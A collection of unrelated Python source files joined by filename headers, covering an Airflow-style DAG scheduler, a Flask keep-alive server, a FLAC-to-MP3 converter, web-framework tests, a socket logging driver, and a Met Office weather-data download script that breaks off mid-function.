def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
dag_runs = DagRun.next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
# metric, way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dag? (we've just created a DagRun for them after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s", len(to_reset), task_instance_str
)
# Issue SQL/finish "Unit of Work", but let @provide_session commit (or if passed a session, let caller
# decide when to commit
session.flush()
return len(to_reset)
|
websever.py | # used to run 24/7 on repl.it
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot is online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start() |
toMP3.py | #!/usr/bin/env python
# encoding: utf-8
import os
import sys
import subprocess
import time
import platform
import multiprocessing as mp
global root_dir
def print_sysinfo():
print '\nPython version : ' + platform.python_version()
print 'compiler : ' + platform.python_compiler()
print '\nsystem : ' + platform.system()
print 'release : ' + platform.release()
print 'machine : ' + platform.machine()
print 'processor : ' + platform.processor()
print 'CPU count : ' + str(mp.cpu_count())
print 'interpreter: ' + platform.architecture()[0]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def searchFlacs(top):
flacs = []
print "Found:"
for root, dirs, files in os.walk(top):
#check if there are flacs in this folder
flacsfound = False
for name in files:
if name.endswith((".flac")):
flacsfound = True
break
if flacsfound:
print root + " ::"
for name in files:
if name.endswith((".flac")):
print " - " + name
flacs.append((root, name))
return flacs
def convert(files):
p_name = mp.current_process().name
FNULL = open('log.txt', 'w')
for dir, file in files:
oldfile = os.path.join(dir, file)
newfile = oldfile.replace(".flac", ".mp3")
#print "Processing: " + oldfile.replace(root_dir, '')
try:
start = time.time()
retcode = subprocess.call(["ffmpeg", "-n", "-i", oldfile, "-qscale:a", "0", newfile], stdout=FNULL, stderr=subprocess.STDOUT)
elapsed = time.time() - start
if os.path.isfile(newfile):
print p_name + ": " + oldfile.replace(root_dir, ''),
print bcolors.OKBLUE + " ... in %s s" % (round(elapsed, 3)) + bcolors.ENDC
else:
print p_name + ": " + oldfile.replace(root_dir, ''),
print bcolors.FAIL + "\n ...ERROR occured! Check log.txt for details!" + bcolors.ENDC
except OSError:
print "Error starting ffmpeg. Did you install ffmpeg and add it to your PATH?"
print ""
raise
return 0
def chunks(l, n):
# Yield successive n-sized chunks from l.
for i in xrange(0, len(l), n):
yield l[i:i+n]
if __name__ == '__main__':
assert len(sys.argv) >= 2, 'Please specify an input folder!'
root_dir = sys.argv[1]
start_overall = time.time()
files = searchFlacs(root_dir)
#convert(files, root_dir)
files_chunks = list(chunks(files, len(files)/4))
jobs = []
for chunk in files_chunks:
p = mp.Process(target=convert, args=(chunk,))
jobs.append(p)
p.start()
#wait for jobs to complete
for p in jobs:
p.join()
elapsed_overall = time.time() - start_overall
print bcolors.BOLD + "Processed all files in %s s" % (round(elapsed_overall, 3)) + bcolors.ENDC
print_sysinfo()
|
falcon_test.py | import pytest
from multiprocessing import Process
from common import send_requests, mode_list, kwargs_list
def server_process(port, mode, **kwargs):
import json
import falcon
from distutils.version import StrictVersion
from wsgiref import simple_server
class HelloWorldResource(object):
def on_get(self, req, resp):
resp.body = json.dumps({'text': 'Hello World!!!'})
if StrictVersion(falcon.__version__) < StrictVersion('3.0.0'):
app = falcon.API()
else:
app = falcon.App()
app.add_route('/hello/world', HelloWorldResource())
if mode == 'auto':
from swagger_ui import api_doc
api_doc(app, **kwargs)
else:
from swagger_ui import falcon_api_doc
falcon_api_doc(app, **kwargs)
httpd = simple_server.make_server('localhost', port, app)
httpd.serve_forever()
@pytest.mark.parametrize('mode', mode_list)
@pytest.mark.parametrize('kwargs', kwargs_list)
def test_falcon(port, mode, kwargs):
if kwargs['url_prefix'] in ('', '/'):
return
proc = Process(target=server_process, args=(port, mode), kwargs=kwargs)
proc.start()
send_requests(port, mode, kwargs)
proc.terminate()
|
test_httpd.py | import asyncio
import threading
from unittest import TestCase
import urllib.request
from rx import Observable
from rx.subjects import Subject
import cyclotron_aio.httpd as httpd
class HttpdServerTestCase(TestCase):
def test_start_server_item(self):
self.assertRaises(TypeError, httpd.StartServer)
item = httpd.StartServer(host='localhost', port=80)
self.assertEqual('localhost', item.host)
self.assertEqual(80, item.port)
def test_start_server(self):
loop = asyncio.new_event_loop()
loop.set_debug(True)
asyncio.set_event_loop(loop)
sink = httpd.Sink(
control = Subject()
)
def on_httpd_item(i):
if type(i) is httpd.ServerStarted:
sink.control.on_next(httpd.StopServer())
elif type(i) == httpd.ServerStopped:
asyncio.get_event_loop().stop()
def control_stream(sink):
sink.control.on_next(httpd.Initialize())
sink.control.on_next(httpd.StartServer(host='localhost', port=9999))
loop.call_soon(control_stream, sink)
source = httpd.make_driver(loop).call(sink)
source.server.subscribe(on_httpd_item)
loop.run_forever()
loop.close()
def test_add_route(self):
routes = [
httpd.AddRoute(methods=['GET'], path='/foo', id='foo'),
httpd.AddRoute(methods=['POST'], path='/bar', id='bar'),
httpd.AddRoute(methods=['PUT'], path='/biz', id='biz'),
]
actual_routes = []
loop = asyncio.new_event_loop()
loop.set_debug(True)
asyncio.set_event_loop(loop)
sink = httpd.Sink(control=Subject())
def setup(sink):
sink.control.on_next(httpd.Initialize()),
sink.control.on_next(httpd.StartServer(host='localhost', port=9999)),
for route in routes:
sink.control.on_next(route)
def on_route_item(i):
if type(i) is httpd.RouteAdded:
actual_routes.append(i)
# stop mainloop when last route is created
if i.id == routes[-1].id:
asyncio.get_event_loop().stop()
loop.call_soon(setup, sink)
source = httpd.make_driver(loop).call(sink)
source.route.subscribe(on_route_item)
loop.run_forever()
loop.close()
self.assertEqual(len(routes), len(actual_routes))
for index,route in enumerate(actual_routes):
self.assertEqual(routes[index].path, route.path)
self.assertEqual(routes[index].id, route.id)
self.assertIsInstance(route.request, Observable)
def test_get(self):
client_thread = None
response = None
loop = asyncio.new_event_loop()
loop.set_debug(True)
asyncio.set_event_loop(loop)
sink = httpd.Sink(control=Subject())
def setup(sink):
sink.control.on_next(httpd.Initialize()),
sink.control.on_next(httpd.AddRoute(
methods=['GET'], path='/foo', id='foo'))
sink.control.on_next(httpd.StartServer(host='localhost', port=8080)),
def do_get():
nonlocal response
req = urllib.request.urlopen('http://localhost:8080/foo')
response = req.read()
# todo rxpy threadpool
client_thread = threading.Thread(target=do_get)
def on_server_item(i):
if type(i) is httpd.ServerStarted:
nonlocal client_thread
client_thread.start()
elif type(i) == httpd.ServerStopped:
asyncio.get_event_loop().stop()
def on_route_item(i):
sink.control.on_next(httpd.Response(context=i.context, data=b'foo'))
loop.call_soon(sink.control.on_next, httpd.StopServer())
loop.call_soon(setup, sink)
source = httpd.make_driver(loop).call(sink)
source.route \
.filter(lambda i : i.id == 'foo') \
.flat_map(lambda i: i.request) \
.subscribe(on_route_item)
source.server \
.subscribe(on_server_item)
loop.run_forever()
loop.close()
client_thread.join()
self.assertEqual(b'foo', response)
|
logsocket.py | """
Wrapper & timestamper of input/out over socket
"""
import socket
import urllib.request
from threading import Thread
from osgar.logger import LogWriter
from osgar.bus import BusShutdownException
class LogSocket:
def __init__(self, socket, config, bus):
bus.register('raw')
self.verbose = False
self.socket = socket
self.input_thread = Thread(target=self.run_input, daemon=True)
self.output_thread = Thread(target=self.run_output, daemon=True)
host = config.get('host')
port = config.get('port')
self.pair = (host, port) # (None, None) for unknown address
if 'timeout' in config:
self.socket.settimeout(config['timeout'])
self.bufsize = config.get('bufsize', 1024)
self.bus = bus
def _send(self, data):
raise NotImplementedError()
def start(self):
self.input_thread.start()
self.output_thread.start()
def join(self, timeout=None):
self.input_thread.join(timeout=timeout)
self.output_thread.join(timeout=timeout)
def run_input(self):
while self.bus.is_alive():
try:
data = self.socket.recv(self.bufsize)
if len(data) > 0:
self.bus.publish('raw', data)
except socket.timeout:
pass
def run_output(self):
try:
while True:
__, channel, data = self.bus.listen()
if channel == 'raw':
self._send(data)
else:
assert False, channel # unsupported channel
except BusShutdownException:
pass
def request_stop(self):
self.bus.shutdown()
class LogTCPBase(LogSocket):
"""
TCP base class for different use cases
"""
def __init__(self, config, bus):
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# https://stackoverflow.com/questions/31826762/python-socket-send-immediately
# https://stackoverflow.com/questions/3761276/when-should-i-use-tcp-nodelay-and-when-tcp-cork
soc.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
super().__init__(soc, config, bus)
def _send(self, data):
self.socket.send(data)
class LogTCPStaticIP(LogTCPBase):
"""
TCP driver for existing static IP (i.e. SICK LIDAR)
"""
def __init__(self, config, bus):
super().__init__(config, bus)
try:
self.socket.connect(self.pair)
except socket.timeout as e:
print('Timeout', self.pair)
raise
class LogTCPDynamicIP(LogTCPBase):
"""
TCP driver for dynamic previously unknown address
(ROS proxy for subscribers)
"""
def start(self):
# on start the address is unknown - it will be received by "output_thread"
self.output_thread.start()
def join(self, timeout=None):
# the "input_thread" is triggered by "output_thread" so make sure
# that "output_thread" is finished and cannot cause race condition
self.output_thread.join(timeout=timeout)
try:
self.input_thread.join(timeout=timeout)
except RuntimeError:
pass
def run_output(self):
try:
while True:
__, channel, data = self.bus.listen()
if channel == 'raw':
self._send(data)
elif channel == 'addr':
self.pair = tuple(data)
self.socket.connect(self.pair)
if not self.input_thread.is_alive():
self.input_thread.start()
else:
assert False, channel # unsupported channel
except BusShutdownException:
pass
class LogTCPServer(LogTCPBase):
"""
TCP driver for server side - prepare connection and wait
for others to connect (ROS proxy for publishers)
"""
def __init__(self, config, bus):
super().__init__(config, bus)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.pair)
self.timeout = config.get('timeout')
def run_input(self):
if self.verbose:
print("Waiting ...")
self.socket.listen(1)
if self.verbose:
print("end of listen")
while self.bus.is_alive():
try:
self.socket, addr = self.socket.accept()
if self.verbose:
print('Connected by', addr)
if self.timeout is not None:
self.socket.settimeout(self.timeout)
super().run_input()
break
except socket.timeout:
pass
class LogUDP(LogSocket):
def __init__(self, config, bus):
soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
LogSocket.__init__(self, soc, config, bus)
try:
self.socket.bind(('', self.pair[1]))
except OSError as e:
if e.errno == 98: # [Errno 98] Address already in use
self.socket.connect(('', self.pair[1]))
def _send(self, data):
self.socket.sendto(data, self.pair)
class LogHTTP:
def __init__(self, config, bus):
bus.register('raw')
self.input_thread = Thread(target=self.run_input, daemon=True)
self.url = config['url']
self.sleep = config.get('sleep', None)
self.bus = bus
def start(self):
self.input_thread.start()
def join(self, timeout=None):
self.input_thread.join(timeout=timeout)
def run_input(self):
while self.bus.is_alive():
try:
# https://github.com/mesonbuild/meson/issues/4087
# without timeout the call can hang the process forever
with urllib.request.urlopen(self.url, timeout=0.5) as f:
data = f.read()
if len(data) > 0:
self.bus.publish('raw', data)
except socket.timeout:
pass
if self.sleep is not None:
self.bus.sleep(self.sleep)
def request_stop(self):
self.bus.shutdown()
if __name__ == "__main__":
import time
from osgar.bus import Bus
config = {'host':'localhost', 'port': 8001, 'timeout': 1.0}
with LogWriter(prefix='test-tcp-') as log:
bus = Bus(log)
device = LogTCPStaticIP(config, bus=bus.handle('tcp'))
device.start()
time.sleep(2)
device.request_stop()
device.join()
# vim: expandtab sw=4 ts=4
|
cda_download.py | # 2021 (C) Crown Copyright, Met Office. All rights reserved.
#
# This file is part of Weather DataHub and is released under the
# BSD 3-Clause license.
# See LICENSE in the root of the repository for full licensing details.
# (c) Met Office 2022
import csv, os
import requests
import argparse
import time
from datetime import datetime
import queue
import threading
import uuid
# Example code to download GRIB data files from the Met Office Weather DataHub via API calls
MODEL_LIST = ["mo-global", "mo-uk", "mo-uk-latlon", "mo-mogrepsg"]
BASE_URL = "https://api-metoffice.apiconnect.ibmcloud.com/metoffice/production/1.0.0"
debugMode = False
printUrl = False
retryCount = 3
def get_order_details(
baseUrl, requestHeaders, orderName, useEnhancedApi, runsToDownload
):
details = None
actualHeaders = {"Accept": "application/json"}
actualHeaders.update(requestHeaders)
url = baseUrl + "/orders/" + orderName + "/latest"
if useEnhancedApi:
url = url + "?detail=MINIMAL"
if len(runsToDownload) == 1:
url = url + "&runfilter=" + runsToDownload[0]
req = requests.get(url, headers=actualHeaders)
if verbose and apikey == "":
print("Plan and limit : " + req.headers["X-RateLimit-Limit"])
print("Remaining calls: " + req.headers["X-RateLimit-Remaining"])
if printUrl == True:
print("get_order_details: ", url)
if url != req.url:
print("redirected to: ", req.url)
if req.status_code != 200:
print(
"ERROR: Unable to load details for order : ",
orderName,
" status code: ",
req.status_code,
)
exit()
else:
details = req.json()
return details
def get_order_file(
baseUrl, requestHeaders, orderName, fileId, guidFileNames, folder, start
):
# If file id is too long or random file names required generate a uuid for the file name
urlMod = ""
global debugMode
if len(fileId) > 100 or guidFileNames:
local_filename = folder + "/" + str(uuid.uuid4()) + ".grib2"
else:
local_filename = folder + "/" + fileId + ".grib2"
ttfb = 0
url = baseUrl + "/orders/" + orderName + "/latest/" + fileId + "/data"
if debugMode == True:
urlMod = input(
"Order: "
+ orderName
+ " File:"
+ fileId
+ "\n"
+ "Enter y to mimic a receive failure on file - 'go' to run to end> "
)
# If you put go all further runs will automatically go through
if urlMod == "go":
debugMode = False
if debugMode == True and urlMod == "y":
url = (
baseUrl
+ "/orders/"
+ orderName
+ "/latest/"
+ fileId
+ urlMod
+ "/data"
)
actualHeaders = {"Accept": "application/x-grib"}
actualHeaders.update(requestHeaders)
with requests.get(
url, headers=actualHeaders, allow_redirects=True, stream=True
) as r:
if printUrl == True:
print("get_order_file: ", url)
if url != r.url:
print("redirected to: ", r.url)
if r.status_code != 200:
raise Exception("HTTP Reason and Status: " + r.reason, r.status_code)
# Record time to first byte
ttfb = start + r.elapsed.total_seconds()
with open(local_filename, "wb") as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
return [ttfb, local_filename]
def get_files_by_run(order, runsToDownload, numFilesPerOrder):
# Break down the files in to those needed for each run
filesByRun = {}
for run in runsToDownload:
filesByRun[run] = []
fc = 0
for f in order["orderDetails"]["files"]:
fileId = f["fileId"]
if "_+" + run in fileId:
filesByRun[run].append(fileId)
fc += 1
if numFilesPerOrder > 0 and fc >= numFilesPerOrder:
break
return filesByRun
def download_worker():
if taskQueue:
while True:
downloadTask = taskQueue.get()
if downloadTask is None:
break
current_time = datetime.now().strftime("%H-%M-%S-%f")
fileSize = 0
errMsg = ""
error = False
timeToFirstByte = 0
startTime = time.time()
try:
downloadResp = get_order_file(
downloadTask["baseUrl"],
downloadTask["requestHeaders"],
downloadTask["orderName"],
downloadTask["fileId"],
downloadTask["guidFileNames"],
downloadTask["folder"],
startTime,
)
timeToFirstByte = round((downloadResp[0] - startTime), 2)
downloadedFile = downloadResp[1]
fileSize = os.path.getsize(downloadedFile)
except Exception as ex:
error = True
errMsg = ex.args
completeTime = time.time()
completeDuration = round((completeTime - startTime), 2)
if error:
downloadTask["downloadErrorLog"].append(
{
"URL": downloadTask["baseUrl"]
+ "/orders/"
+ downloadTask["orderName"]
+ "/latest/"
+ downloadTask["fileId"]
+ "/data",
"fileid": downloadTask["fileId"],
"currentTime": current_time,
"ordername": downloadTask["orderName"],
"folder": downloadTask["folder"],
}
)
downloadTask["responseLog"].append(
{
"order": downloadTask["orderName"],
"fileId": downloadTask["fileId"],
"error": error,
"fileSize": fileSize,
"errMsg": errMsg,
"time_to_first_byte": timeToFirstByte,
"duration": completeDuration,
"file": "",
"currentTime": current_time,
}
)
if verbose:
print(
"File: "
+ downloadTask["fileId"]
+ " failed "
+ format(errMsg)
+ "\n"
)
else:
downloadTask["responseLog"].append(
{
"order": downloadTask["orderName"],
"fileId": downloadTask["fileId"],
"error": error,
"fileSize": fileSize,
"errMsg": errMsg,
"time_to_first_byte": timeToFirstByte,
"duration": completeDuration,
"file": downloadedFile,
"currentTime": current_time,
}
)
taskQueue.task_done()
def write_failures(downloadErrorLog, fileName):
if len(downloadErrorLog) == 0:
return
with open(fileName, "w") as failurefile:
for line in downloadErrorLog:
failurefile.write(line["URL"] + "\n")
failurefile.close()
def write_summary(responseLog, fileName, sstartTime):
endTime = datetime.now()
if len(responseLog) == 0:
return
with open(fileName, "w", newline="") as csvfile:
fileSizeTotal = 0
index = 0
csvfile.write(
"The download of order ["
+ responseLog[0]["order"]
+ "] started at: "
+ sstartTime.strftime("%d/%m/%Y %H:%M:%S")
+ " finished at: "
+ endTime.strftime("%d/%m/%Y %H:%M:%S\n")
)
for row in responseLog:
fileSizeTotal += responseLog[index]["fileSize"]
index += 1
csvfile.write(
"Total Files: "
+ str(len(responseLog))
+ " Total time taken: "
+ str(round((endTime - sstartTime).total_seconds(), 2))
+ "s Total Size: "
+ str(fileSizeTotal)
+ " Workers: "
+ str(numThreads)
+ "\n"
)
csvfile.write("===== Detail Section =====\n")
fieldnames = [
"order",
"duration",
"time_to_first_byte",
"fileSize",
"fileId",
"error",
"errMsg",
"file",
"currentTime",
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for row in responseLog:
writer.writerow(row)
# csvfile.write("Total Files: " + str(len(responseLog)) + " Total time taken: " + str(round((endTime-sstartTime).total_seconds(),2)) + "s Total Size: " + str(fileSizeTotal) + "\n")
if verbose:
print(
" Total Files: "
+ str(len(responseLog))
+ " Total time taken: "
+ str(round((endTime - sstartTime).total_seconds(), 2))
+ "s Total Size: "
+ str(fileSizeTotal)
+ " Workers: "
+ str(numThreads)
+ "\n"
)
def join_files(responseLog, joinedFileName):
with open(joinedFileName, "wb") as outfile:
for f in responseLog:
with open(f["file"], "rb") as infile:
while True:
chunk = infile.read(8192)
if not chunk:
break
outfile.write(chunk)
os.remove(f["file"])
def get_my_orders(baseUrl, requestHeaders):
ordHeaders = {"Accept": "application/json"}
ordHeaders.update(requestHeaders)
ordurl = baseUrl + "/orders?detail=MINIMAL"
ordr = requests.get(ordurl, headers=ordHeaders)
if printUrl == True:
print("get_my_orders: ", ordurl)
if ordurl != ordr.url:
print("redirected to: ", ordr.url)
if ordr.status_code != 200:
print("ERROR: Unable to get my orders list. Status code: ", ordr.status_code)
exit()
orddetails = ordr.json()
return orddetails
def get_latest_run(modelID, orderName, modelRuns):
latestRun = modelRuns[modelID][:2]
latestDate = modelRuns[modelID][3:]
stamp = latestDate[:10] + ":" + latestRun
if not os.path.exists(baseFolder + LATEST_FOLDER + "/" + orderName + ".txt"):
# File not there - so write it and return latest run
rf = open(baseFolder + LATEST_FOLDER + "/" + orderName + ".txt", "w")
rf.write(stamp)
rf.close()
else:
# Open the file and retrieve the last run
rf = open(baseFolder + LATEST_FOLDER + "/" + orderName + ".txt", "r")
laststamp = rf.read()
rf.close()
# Check to see if the latest is later than the last run
if stamp > laststamp:
rf = open(baseFolder + LATEST_FOLDER + "/" + orderName + ".txt", "w")
rf.write(stamp)
rf.close()
else:
latestRun = "done" + ":" + latestRun
return latestRun
def get_model_runs(baseUrl, requestHeaders, modelList):
modelRuns = {}
runHeaders = {"Accept": "application/json"}
runHeaders.update(requestHeaders)
for model in modelList:
